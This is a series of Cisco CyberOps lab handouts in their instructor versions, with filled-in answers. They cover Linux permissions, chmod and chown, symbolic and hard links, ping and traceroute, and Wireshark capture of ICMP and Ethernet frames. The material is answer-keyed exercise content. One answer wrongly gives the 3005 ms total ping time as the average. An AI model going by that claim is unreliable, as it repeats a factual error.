 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

touch: cannot touch '/mnt/myNewFile.txt': Permission denied

Why was the file not created? List the permissions, ownership and content of the /mnt directory and
explain what happened. With the addition of -d option, it lists the permission of the parent directory.
Record the answer in the lines below.
[analyst@secOps ~]$ ls -ld /mnt
drwxr-xr-x 2 root root 4096 Mar 3 15:43 /mnt
____________________________________________________________________________________
____________________________________________________________________________________
The permissions of /mnt directory is owned by the root user, with permissions drwxr-xr-x. This way, only
the root user is allowed to write to the /mnt folder.
What can be done for the touch command shown above to be successful?
____________________________________________________________________________________
____________________________________________________________________________________
The command can be executed as root (adding sudo before it) or the permissions of the /mnt directory
can be modified.
d. The chmod command is used to change the permissions of a file or directory. As before, mount the
/dev/sdb1 partition on the /home/analyst/second_drive directory created earlier in this lab:
[analyst@secOps ~]$ sudo mount /dev/sdb1 ~/second_drive/
e. Change to the second_drive directory and list the contents of it:
[analyst@secOps ~]$ cd ~/second_drive
[analyst@secOps second_drive]$ ls -l
total 20
drwx------ 2 root root 16384 Mar 3 10:59 lost+found
-rw-r--r-- 1 root root 183 Mar 3 15:42 myFile.txt
What are the permissions of the myFile.txt file?
____________________________________________________________________________________
-rw-r--r--
f. Use the chmod command to change the permissions of myFile.txt.
[analyst@secOps second_drive]$ sudo chmod 665 myFile.txt
[analyst@secOps second_drive]$ ls -l
total 20
drwx------ 2 root root 16384 Mar 3 10:59 lost+found
-rw-rw-r-x 1 root root 183 Mar 3 15:42 myFile.txt
Did the permissions change? What are the permissions of myFile.txt?
____________________________________________________________________________________
-rw-rw-r-x
The chmod command takes permissions in the octal format. In that way, a breakdown of the 665 is as
follows:
6 in octal is 110 in binary. Assuming each position of the permissions of a file can be 1 or 0, 110 means
rw- (read=1, write=1 and execute=0).
Therefore, the chmod 665 myFile.txt command changes the permissions to:
Owner: rw- (6 or 110 in octal)

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

Group: rw- (6 or 110 in octal)

Other: r-x (5 or 101 in octal)
What command would change the permissions of myFile.txt to rwxrwxrwx, granting any user in the
system full access to the file?
____________________________________________________________________________________
sudo chmod 777 myFile.txt
g. The chown command is used to change ownership of a file or directory. Issue the command below to
make the analyst user the owner of the myFile.txt:
[analyst@secOps second_drive]$ sudo chown analyst myFile.txt
[sudo] password for analyst:
[analyst@secOps second_drive]$ ls -l
total 20
drwx------ 2 root root 16384 Mar 3 10:59 lost+found
-rw-rw-r-x 1 analyst root 183 Mar 3 15:42 myFile.txt
[analyst@secOps second_drive]$
Note: To change the owner and group to analyst at the same time, use the sudo chown analyst:analyst
myFile.txt format.
h. Now that analyst is the file owner, try appending the word ‘test’ to the end of myFile.txt.
[analyst@secOps second_drive]$ echo test >> myFile.txt
[analyst@secOps second_drive]$ cat myFile.txt
Was the operation successful? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes. Analyst is the owner of the file and the permissions are still set to 665 as before. The permissions as
they are, allow the owner and users in the analyst group to make changes to the file.

Step 2: Directory and Permissions

Similar to regular files, directories also carry permissions. Directories, however, have an extra bit in the
permissions.
a. Change back to the /home/analyst/lab.support.files directory and issue the ls -l command to list all the
files with details:
[analyst@secOps second_drive]$ cd ~/lab.support.files/
[analyst@secOps lab.support.files]$ ls -l
total 580
-rw-r--r-- 1 analyst analyst 649 Jun 28 18:34 apache_in_epoch.log
-rw-r--r-- 1 analyst analyst 126 Jun 28 11:13 applicationX_in_epoch.log
drwxr-xr-x 4 analyst analyst 4096 Aug 7 15:29 attack_scripts
-rw-r--r-- 1 analyst analyst 102 Jul 20 09:37 confidential.txt
-rw-r--r-- 1 analyst analyst 2871 Dec 15 2016 cyops.mn
-rw-r--r-- 1 analyst analyst 75 May 24 11:07 elk_services
-rw-r--r-- 1 analyst analyst 373 Feb 16 16:04 h2_dropbear.banner
-rw-r--r-- 1 analyst analyst 147 Mar 21 15:30 index.html
-rw-r--r-- 1 analyst analyst 255 May 2 13:11 letter_to_grandma.txt

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

-rw-r--r-- 1 analyst analyst 24464 Feb 7 2017 logstash-tutorial.log

drwxr-xr-x 2 analyst analyst 4096 May 25 13:01 malware
-rwxr-xr-x 1 analyst analyst 172 Jul 25 16:27 mininet_services
drwxr-xr-x 2 analyst analyst 4096 Feb 14 2017 openssl_lab
drwxr-xr-x 2 analyst analyst 4096 Aug 7 15:25 pcaps
drwxr-xr-x 7 analyst analyst 4096 Sep 20 2016 pox
-rw-r--r-- 1 analyst analyst 473363 Feb 16 15:32 sample.img
-rw-r--r-- 1 analyst analyst 65 Feb 16 15:45 sample.img_SHA256.sig
drwxr-xr-x 3 analyst analyst 4096 Jul 18 10:10 scripts
-rw-r--r-- 1 analyst analyst 25553 Feb 13 2017 SQL_Lab.pcap
Compare the permissions of the malware directory with the mininet_services file. What is the difference
between their permissions?
____________________________________________________________________________________
____________________________________________________________________________________
There is a letter d at the beginning of the permissions for the malware directory.
The letter ‘d’ indicates that that specific entry is a directory and not a file. Another difference between file
and directory permissions is the execution bit. If a file has its execution bit turned on, it means it can be
executed by the system. Directories are different than files with the execution bit set (a file with the
execution bit set is an executable script or program). A directory with the execution bit set specifies
whether a user can enter that directory.
The chmod and chown commands work for directories in the same way they work for files.

Part 3: Symbolic Links and other Special File Types

You have now seen some of the different file types in Linux. The first character in each file listing in an ls –l
command shows the file type. The three different types of files in Linux including their sub-types and
characters are:
 Regular files (-) including:
- Readable files – text files
- Binary files - programs
- Image files
- Compressed files
 Directory files (d)
- Folders
 Special Files including:
- Block files (b) – Files used to access physical hardware like mount points to access hard drives.
- Character device files (c) – Files that provide a serial stream of input and output. tty terminals are
examples of this type of file.
- Pipe files (p) – A file used to pass information where the first bytes in are the first bytes. This is also
known as FIFO (first in first out).
- Symbolic Link files (l) – Files used to link to other files or directories. There are two types: symbolic
links and hard links.
- Socket files (s) – These are used to pass information from application to application in order to
communicate over a network.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

Step 1: Examine file types.

a. Use the ls -l command to display the files. Notice the first characters of each line are either a “–“
indicating a file or a “d” indicating a directory
[analyst@secOps ~]$ ls -l
total 28
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:15 cyops_folder2
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 3 analyst analyst 4096 Mar 3 18:23 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:11 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
b. Produce a listing of the /dev directory. Scroll to the middle of the output and notice how the block files
begin with a “b”, the character device files begin with a “c” and the symbolic link files begin with an “l”:
[analyst@secOps ~]$ ls -l /dev/
<output omitted>
crw-rw-rw- 1 root tty 5, 2 May 29 18:32 ptmx
drwxr-xr-x 2 root root 0 May 23 06:40 pts
crw-rw-rw- 1 root root 1, 8 May 23 06:41 random
crw-rw-r-- 1 root root 10, 56 May 23 06:41 rfkill
lrwxrwxrwx 1 root root 4 May 23 06:41 rtc -> rtc0
crw-rw---- 1 root audio 253, 0 May 23 06:41 rtc0
brw-rw---- 1 root disk 8, 0 May 23 06:41 sda
brw-rw---- 1 root disk 8, 1 May 23 06:41 sda1
brw-rw---- 1 root disk 8, 16 May 23 06:41 sdb
brw-rw---- 1 root disk 8, 17 May 23 06:41 sdb1
drwxrwxrwt 2 root root 40 May 28 13:47 shm
crw------- 1 root root 10, 231 May 23 06:41 snapshot
drwxr-xr-x 2 root root 80 May 23 06:41 snd
brw-rw----+ 1 root optical 11, 0 May 23 06:41 sr0
lrwxrwxrwx 1 root root 15 May 23 06:40 stderr -> /proc/self/fd/2
lrwxrwxrwx 1 root root 15 May 23 06:40 stdin -> /proc/self/fd/0
lrwxrwxrwx 1 root root 15 May 23 06:40 stdout -> /proc/self/fd/1
crw-rw-rw- 1 root tty 5, 0 May 29 17:36 tty
crw--w---- 1 root tty 4, 0 May 23 06:41 tty0
<output omitted>
c. Symbolic links in Linux are like shortcuts in Windows. There are two types of links in Linux: symbolic links
and hard links. The difference between symbolic links and a hard links is that a symbolic link file points to
the name of another file and a hard link file points to the contents of another file. Create two files by using
echo:
[analyst@secOps ~]$ echo "symbolic" > file1.txt
[analyst@secOps ~]$ cat file1.txt
symbolic
[analyst@secOps ~]$ echo "hard" > file2.txt
[analyst@secOps ~]$ cat file2.txt
hard

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

d. Use ln –s to create a symbolic link to file1.txt, and ln to create a hard link to file2.txt:
[analyst@secOps ~]$ ln –s file1.txt file1symbolic
[analyst@secOps ~]$ ln file2.txt file2hard
e. Use the ls –l command and examine the directory listing:
[analyst@secOps ~]$ ls -l
total 40
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:15 cyops_folder2
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
lrwxrwxrwx 1 analyst analyst 9 Aug 17 16:43 file1symbolic -> file1.txt
-rw-r--r-- 1 analyst analyst 9 Aug 17 16:41 file1.txt
-rw-r--r-- 2 analyst analyst 5 Aug 17 16:42 file2hard
-rw-r--r-- 2 analyst analyst 5 Aug 17 16:42 file2.txt
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 3 analyst analyst 4096 Mar 3 18:23 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:11 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
Notice how the file file1symbolic is a symbolic link with an l at the beginning of the line and a pointer ->
to file1.txt. The file2hard appears to be a regular file, because in fact it is a regular file that happens to
point to the same inode on the hard disk drive as file2.txt. In other words, file2hard points to the same
attributes and disk block location as file2.txt.
f. Change the names of the original files: file1.txt and file2.txt, and notice how it effects the linked files.
[analyst@secOps ~]$ mv file1.txt file1new.txt
[analyst@secOps ~]$ mv file2.txt file2new.txt

[analyst@secOps ~]$ cat file1symbolic

cat: file1symbolic: no such file or directory

[analyst@secOps ~]$ cat file2hard

hard
Notice how file1symbolic is now a broken symbolic link because the name of the file that it pointed to
file1.txt has changed, but the hard link file file2hard still works correctly because it points to the inode of
file2.txt and not its name which is now file2new.txt.
What do you think would happen to file2hard if you opened a text editor and changed the text in
file2new.txt?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Changing the contents of one file would change the contents of the other because they both point to the
same inode on the hard disk drive.

Reflection
File permissions and ownership are two of the most important aspects of Linux. They are also a common
cause of problems. A file that has the wrong permissions or ownership set will not be available to the

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

programs that need to access it. In this scenario, the program will usually break and errors will be
encountered.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 10 www.netacad.com
Lab – Tracing a Route (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Verifying Network Connectivity Using Ping
Part 2: Tracing a Route to a Remote Server Using Traceroute
Part 3: Trace a Route to a Remote Server Using Web-Based Traceroute Tool

Background
Tracing a route will list each routing device that a packet crosses as it traverses the network from source to
destination. Route tracing is typically executed at the command line as:
tracert <destination network name or end device address>
(Microsoft Windows systems)
or
traceroute <destination network name or end device address>
(Unix and similar systems)
The traceroute (or tracert) tool is often used for network troubleshooting. By showing a list of routers
traversed, it allows the user to identify the path taken to reach a particular destination on the network or
across internetworks. Each router represents a point where one network connects to another network and
through which the data packet was forwarded. The number of routers is known as the number of "hops" the
data traveled from source to destination.
The displayed list can help identify data flow problems when trying to access a service such as a website. It
can also be useful when performing tasks such as downloading data. If there are multiple websites (mirrors)
available for the same data file, one can trace each mirror to get a good idea of which mirror would be the
fastest to use.
Two trace routes between the same source and destination conducted some time apart may produce different
results. This is due to the "meshed" nature of the interconnected networks that comprise the Internet and the
Internet Protocols’ ability to select different pathways over which to send packets.
Command-line-based route tracing tools are usually embedded with the operating system of the end device.

Scenario
Using an Internet connection, you will use two route tracing utilities to examine the Internet pathway to
destination networks. First, you will verify connectivity to a website. Second, you will use the traceroute utility
on the Linux command line. Third, you will use a web-based traceroute tool
(http://www.monitis.com/traceroute/).
Instructor Note: Some institutions disable ICMP echo replies used by both ping and traceroute utilities.
Before students begin this activity, make sure there are no local restrictions related to ICMP datagrams. This
activity assumes that ICMP datagrams are not restricted by any local security policy.

Required Resources
 CyberOps Workstation VM
 Internet access

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 4 www.netacad.com
Lab – Tracing a Route

Part 1: Verifying Network Connectivity Using Ping

To trace the route to a distant network, the VM must have a working connection to the Internet.
a. Start the CyberOps Workstation VM. Log into the VM with the following credentials:
Username: analyst
Password: cyberops
b. Open a terminal window in the VM to ping a remote server, such as www.cisco.com.
[analyst@secOps ~]$ ping -c 4 www.cisco.com
PING e2867.dsca.akamaiedge.net (184.24.123.103) 56(84) bytes of data.
64 bytes from a184-24-123-103.deploy.static.akamaitechnologies.com
(184.24.123.103): icmp_seq=1 ttl=59 time=13.0 ms
64 bytes from a184-24-123-103.deploy.static.akamaitechnologies.com
(184.24.123.103): icmp_seq=2 ttl=59 time=12.5 ms
64 bytes from a184-24-123-103.deploy.static.akamaitechnologies.com
(184.24.123.103): icmp_seq=3 ttl=59 time=14.9 ms
64 bytes from a184-24-123-103.deploy.static.akamaitechnologies.com
(184.24.123.103): icmp_seq=4 ttl=59 time=11.9 ms

--- e2867.dsca.akamaiedge.net ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 11.976/13.143/14.967/1.132 ms
c. The first output line displays the Fully Qualified Domain Name (FQDN) e2867.dsca.akamaiedge.net. This
is followed by the IP address 184.24.123.103. Cisco hosts the same web content on different servers
throughout the world (known as mirrors). Therefore, depending upon where you are geographically, the
FQDN and the IP address will be different.
Four pings were sent and a reply was received from each ping. Because each ping received a response,
there was 0% packet loss. On average, it took 3005 ms (3005 milliseconds) for the packets to cross the
network. A millisecond is 1/1,000th of a second. Your results will likely be different.
Instructor Note: If the first ICMP packet times out, this could be a result of the PC resolving the
destination address. This should not occur if you repeat the ping as the address is now cached.

Part 2: Tracing a Route to a Remote Server Using Traceroute

Now that basic reachability has been verified by using the ping tool, it is helpful to look more closely at each
network segment that is crossed.
Routes traced can go through many hops and a number of different Internet Service Providers (ISPs),
depending on the size of your ISP and the location of the source and destination hosts. Each “hop” represents
a router. A router is a specialized type of computer used to direct traffic across the Internet. Imagine taking an
automobile trip across several countries using many highways. At different points in the trip you come to a
fork in the road in which you have the option to select from several different highways. Now further imagine
that there is a device at each fork in the road that directs you to take the correct highway to your final
destination. That is what a router does for packets on a network.
Because computers talk in decimal or hexadecimal numbers, rather than words, routers are uniquely
identified using IP addresses. The traceroute tool shows you what path through the network a packet of
information takes to reach its final destination. The traceroute tool also gives you an idea of how fast traffic is
going on each segment of the network. Packets are sent to each router in the path, and the return time is
measured in milliseconds.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 4 www.netacad.com
Lab – Tracing a Route

To do this, the traceroute tool is used.

a. At the terminal prompt, type traceroute www.cisco.com.
[analyst@secOps ~]$ traceroute www.cisco.com
traceroute to www.cisco.com (184.24.123.103), 30 hops max, 60 byte packets
1 192.168.1.1 (192.168.1.1) 6.527 ms 6.783 ms 6.826 ms
2 10.39.176.1 (10.39.176.1) 27.748 ms 27.533 ms 27.480 ms
3 100.127.65.250 (100.127.65.250) 27.864 ms 28.570 ms 28.566 ms
4 70.169.73.196 (70.169.73.196) 29.063 ms 35.025 ms 33.976 ms
5 fed1bbrj01.xe110.0.rd.sd.cox.net (68.1.0.155) 39.101 ms 39.120 ms
39.108 ms
6 a184-24-123-103.deploy.static.akamaitechnologies.com (184.24.123.103)
38.004 ms 13.583 ms 13.612 ms
b. If you would like to save the traceroute output to a text file for later review, use the right carat (>) and the
desired filename to save the output in the present directory. In this example, the traceroute output is
saved in the /home/analyst/cisco-traceroute.txt file.
[analyst@secOps ~]$ traceroute www.cisco.com > cisco-traceroute.txt
You can now enter the cat cisco-traceroute.txt command to view the output of the trace stored in the
text file.
c. Perform and save the traceroute results for one of the following websites. These are the Regional Internet
Registry (RIR) websites located in different parts of the world:
Africa: www.afrinic.net
Australia: www.apnic.net
Europe: www.ripe.net
South America: www.lacnic.net
Note: Some of these routers along the route may not respond to traceroute.

Part 3: Trace a Route to a Remote Server Using Web-Based Traceroute

Tool
a. Open a web browser in the VM and navigate to http://www.monitis.com/traceroute/.
b. Enter any website you wish to replace Example: google.com and press Start Test.

c. Review the geographical locations of the responding hops. What did you observe regarding the path?
____________________________________________________________________________________
____________________________________________________________________________________
It does not always take the shortest path from the source to the destination.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 4 www.netacad.com
Lab – Tracing a Route

Reflection
How is the traceroute different when going to www.cisco.com or other websites from the terminal (see Part 2)
rather than from the online website? (Your results may vary depending upon where you are located
geographically, and which ISP is providing connectivity to your school.)
_______________________________________________________________________________________
_______________________________________________________________________________________
The traceroute from the terminal is different than the one from the website. The domains, such as cisco.com,
can be hosted on many websites or mirrors throughout the world. This is done so that access time to the site
will be fast from anywhere in the world.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 4 www.netacad.com
Lab – Introduction to Wireshark (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Mininet Topology

Objectives
Part 1: Install and Verify the Mininet Topology
Part 2: Capture and Analyze ICMP Data in Wireshark

Background / Scenario
The CyberOps VM includes a Python script that, when you run it, will set up and configure the devices shown
in the figure above. You will then have access to four hosts, a switch, and a router inside your one VM. This
will allow you to simulate a variety of network protocols and services without having to configure a physical
network of devices. For example, in this lab you will use the ping command between two hosts in the Mininet
Topology and capture those pings with Wireshark.
Wireshark is a software protocol analyzer, or "packet sniffer" application, used for network troubleshooting,
analysis, software and protocol development, and education. As data streams travel over the network, the
sniffer "captures" each protocol data unit (PDU) and can decode and analyze its content according to the
appropriate RFC or other specifications.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab – Introduction to Wireshark

Wireshark is a useful tool for anyone working with networks for data analysis and troubleshooting. You will
use Wireshark to capture ICMP data packets.

Required Resources
 CyberOps VM
 Internet access
Instructor Note: Using a packet sniffer, such as Wireshark, may be considered a breach of the security
policy of the school. It is recommended that permission is obtained before running Wireshark for this lab. If
using a packet sniffer, such as Wireshark, is an issue, the instructor may wish to assign the lab as homework
or perform a walk-through demonstration.

Part 1: Install and Verify the Mininet Topology

In this part, you will use a Python script to set up the Mininet Topology inside the CyberOps VM. You will then
record the IP and MAC addresses for H1 and H2.

Step 1: Verify your PC’s interface addresses.

Start and log into your CyberOps Workstation that you have installed in a previous lab using the following
credentials:
Username: analyst Password: cyberops

Step 2: Run the Python script to install the Mininet Topology.

Open a terminal emulator to start mininet and enter the following command at the prompt. When prompted,
enter cyberops as the password.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab – Introduction to Wireshark

[analyst@secOps ~]$ sudo ~/lab.support.files/scripts/cyberops_topo.py

[sudo] password for analyst:

Step 3: Record IP and MAC addresses for H1 and H2.

a. At the mininet prompt, start terminal windows on hosts H1 and H2. This will open separate windows for
these hosts. Each host will have its own separate configuration for the network including unique IP and
MAC addresses.
*** Starting CLI:
mininet> xterm H1
mininet> xterm H2
b. At the prompt on Node: H1, enter ifconfig to verify the IPv4 address and record the MAC address. Do
the same for Node: H2. The IPv4 address and MAC address are highlighted below for reference.
[root@secOps analyst]# ifconfig
H1-eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.0.11 netmask 255.255.255.0 broadcast 10.0.0.255
inet6 fe80::2c69:4dff:febb:a219 prefixlen 64 scopeid 0x20<link>
ether 26:3a:45:65:75:23 txqueuelen 1000 (Ethernet)
RX packets 152 bytes 13036 (12.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 107 bytes 9658 (9.4 KiB)

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab – Introduction to Wireshark

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Host-interface IP Address MAC Address

H1-eth0 10.0.0.11 Answers may vary. 26:3a:45:65:75:23

H2-eth0 10.0.0.12 Answers may vary. 4e:b8:9c:5a:aa:50

Part 2: Capture and Analyze ICMP Data in Wireshark

In this part, you will ping between two hosts in the Mininet and capture ICMP requests and replies in
Wireshark. You will also look inside the captured PDUs for specific information. This analysis should help to
clarify how packet headers are used to transport data to the destination.

Step 1: Examine the captured data on the same LAN.

In this step, you will examine the data that was generated by the ping requests of your team member’s PC.
Wireshark data is displayed in three sections: 1) The top section displays the list of PDU frames captured with
a summary of the IP packet information listed, 2) the middle section lists PDU information for the frame
selected in the top part of the screen and separates a captured PDU frame by its protocol layers, and 3) the
bottom section displays the raw data of each layer. The raw data is displayed in both hexadecimal and
decimal form.

a. On Node: H1, enter wireshark-gtk & to start Wireshark (The pop-up warning is not important for this
lab.). Click OK to continue.
[root@secOps]# wireshark-gtk &
[1] 1552
[root@secOps ~]#
** (wireshark-gtk:1552): WARNING **: Couldn't connect to accessibility bus:
Failed to connect to socket /tmp/dbus-f0dFz9baYA: Connection refused
Gtk-Message: GtkDialog mapped without a transient parent. This is
discouraged.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
Lab – Introduction to Wireshark

b. In the Wireshark window, under the Capture heading, select the H1-eth0 interface. Click Start to capture
the data traffic.

c. On Node: H1, press the Enter key, if necessary, to get a prompt. Then type ping -c 5 10.0.0.12 to ping
H2 five times. The command option -c specifies the count or number of pings. The 5 specifies that five
pings should be sent. The pings will all be successful.
[root@secOps analyst]# ping -c 5 10.0.0.12
d. Navigate to the Wireshark window, click Stop to stop the packet capture.
e. A filter can be applied to display only the interested traffic.
Type icmp in the Filter field and click Apply.
f. If necessary, click the first ICMP request PDU frames in the top section of Wireshark. Notice that the
Source column has H1’s IP address, and the Destination column has H2’s IP address.

g. With this PDU frame still selected in the top section, navigate to the middle section. Click the arrow to the
left of the Ethernet II row to view the Destination and Source MAC addresses.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab – Introduction to Wireshark

Does the Source MAC address match H1’s interface? ______ Yes
Does the Destination MAC address in Wireshark match H2’s MAC address? _____ Yes
Note: In the preceding example of a captured ICMP request, ICMP data is encapsulated inside an IPv4
packet PDU (IPv4 header) which is then encapsulated in an Ethernet II frame PDU (Ethernet II header)
for transmission on the LAN.

Step 2: Examine the captured data on the remote LAN.

You will ping remote hosts (hosts not on the LAN) and examine the generated data from those pings. You will
then determine what is different about this data from the data examined in Part 1.
a. At the mininet prompt, start terminal windows on hosts H4 and R1.
mininet> xterm H4
mininet> xterm R1
b. At the prompt on Node: H4, enter ifconfig to verify the IPv4 address and record the MAC address. Do
the same for the Node: R1.
[root@secOps analyst]# ifconfig

Host-interface IP Address MAC Address

H4-eth0 172.16.0.40 Answers may vary.

R1-eth1 10.0.0.1 Answers may vary.
R1-eth2 172.16.0.1 Answers may vary.

c. Start a new Wireshark capture on H1 by selecting Capture > Start. You can also click the Start button or
type Ctrl-E Click Continue without Saving to start a new capture.
d. H4 is a simulated remote server. Ping H4 from H1. The ping should be successful.
[root@secOps analyst]# ping -c 5 172.16.0.40
e. Review the captured data in Wireshark. Examine the IP and MAC addresses that you pinged. Notice that
the MAC address is for the R1-eth1 interface. List the destination IP and MAC addresses.
IP: ________________________________ MAC: _________________________________________
IP addresses: 172.16.0.40. MAC address: This will be associated with the R1-eth1 interface, which is the
default gateway for the hosts H1, H2, and H3 in this LAN.
f. In the main CyberOps VM window, enter quit to stop Mininet.
mininet> quit
*** Stopping 0 controllers

*** Stopping 4 terms

*** Stopping 5 links
.....
*** Stopping 1 switches
s1
*** Stopping 5 hosts
H1 H2 H3 H4 R1
*** Done

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab – Introduction to Wireshark

g. To clean up all the processes that were used by Mininet, enter the sudo mn -c command at the prompt.
analyst@secOps ~]$ sudo mn -c
[sudo] password for analyst:
*** Removing excess controllers/ofprotocols/ofdatapaths/pings/noxes
killall controller ofprotocol ofdatapath ping nox_core lt-nox_core ovs-openflowd ovs-
controller udpbwtest mnexec ivs 2> /dev/null
killall -9 controller ofprotocol ofdatapath ping nox_core lt-nox_core ovs-openflowd
ovs-controller udpbwtest mnexec ivs 2> /dev/null
pkill -9 -f "sudo mnexec"
*** Removing junk from /tmp
rm -f /tmp/vconn* /tmp/vlogs* /tmp/*.out /tmp/*.log
*** Removing old X11 tunnels
*** Removing excess kernel datapaths
ps ax | egrep -o 'dp[0-9]+' | sed 's/dp/nl:/'
*** Removing OVS datapaths
ovs-vsctl --timeout=1 list-br
ovs-vsctl --timeout=1 list-br
*** Removing all links of the pattern foo-ethX
ip link show | egrep -o '([-_.[:alnum:]]+-eth[[:digit:]]+)'
ip link show
*** Killing stale mininet node processes
pkill -9 -f mininet:
*** Shutting down stale tunnels
pkill -9 -f Tunnel=Ethernet
pkill -9 -f .ssh/mn
rm -f ~/.ssh/mn/*
*** Cleanup complete.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Mininet Topology

Objectives
Part 1: Examine the Header Fields in an Ethernet II Frame
Part 2: Use Wireshark to Capture and Analyze Ethernet Frames

Background / Scenario
When upper layer protocols communicate with each other, data flows down the Open Systems
Interconnection (OSI) layers and is encapsulated into a Layer 2 frame. The frame composition is dependent
on the media access type. For example, if the upper layer protocols are TCP and IP and the media access is
Ethernet, then the Layer 2 frame encapsulation will be Ethernet II. This is typical for a LAN environment.
When learning about Layer 2 concepts, it is helpful to analyze frame header information. In the first part of this
lab, you will review the fields contained in an Ethernet II frame. In Part 2, you will use Wireshark to capture
and analyze Ethernet II frame header fields for local and remote traffic.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

Required Resources
 CyberOps Workstation VM
 Internet Access

Part 1: Examine the Header Fields in an Ethernet II Frame

In Part 1, you will examine the header fields and content in an Ethernet II Frame provided to you. A Wireshark
capture will be used to examine the contents in those fields.

Step 1: Review the Ethernet II header field descriptions and lengths.

Destination Source Frame

Preamble Address Address Type Data FCS

8 Bytes 6 Bytes 6 Bytes 2 Bytes 46 – 1500 Bytes 4 Bytes

Step 2: Examine Ethernet frames in a Wireshark capture.

The Wireshark capture below shows the packets generated by a ping being issued from a PC host to its
default gateway. A filter has been applied to Wireshark to view the ARP and ICMP protocols only. The
session begins with an ARP query for the MAC address of the gateway router, followed by four ping requests
and replies.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

Step 3: Examine the Ethernet II header contents of an ARP request.

The following table takes the first frame in the Wireshark capture and displays the data in the Ethernet II
header fields.

Field Value Description

Preamble Not shown in capture This field contains synchronizing bits, processed by the NIC
hardware.
Destination Address Broadcast Layer 2 addresses for the frame. Each address is 48 bits
(ff:ff:ff:ff:ff:ff) long, or 6 octets, expressed as 12 hexadecimal digits, 0-
9,A-F.
Source Address IntelCor_62:62:6d
A common format is 12:34:56:78:9A:BC.
(f4:8c:50:62:62:6d)
The first six hex numbers indicate the manufacturer of the
network interface card (NIC), the last six hex numbers are
the serial number of the NIC.
The destination address may be a broadcast, which contains
all ones, or a unicast. The source address is always unicast.
Frame Type 0x0806 For Ethernet II frames, this field contains a hexadecimal
value that is used to indicate the type of upper-layer protocol
in the data field. There are numerous upper-layer protocols
supported by Ethernet II. Two common frame types are:
Value Description
0x0800IPv4 Protocol
0x0806 Address resolution protocol (ARP)
Data ARP Contains the encapsulated upper-level protocol. The data
field is between 46 – 1,500 bytes.
FCS Not shown in capture Frame Check Sequence, used by the NIC to identify errors
during transmission. The value is computed by the sending
machine, encompassing frame addresses, type, and data
field. It is verified by the receiver.

What is significant about the contents of the destination address field?

_______________________________________________________________________________________
_______________________________________________________________________________________
All hosts on the LAN will receive this broadcast frame. The host with the IP address of 192.168.1.1 (default
gateway) will send a unicast reply to the source (PC host). This reply contains the MAC address of the NIC of
the Default Gateway.
Why does the PC send out a broadcast ARP prior to sending the first ping request?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Before the PC can send a ping request to a host, it needs to determine the destination MAC address before it
can build the frame header for that ping request. The ARP broadcast is used to request the MAC address of
the host with the IP address contained in the ARP.
What is the MAC address of the source in the first frame? _________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

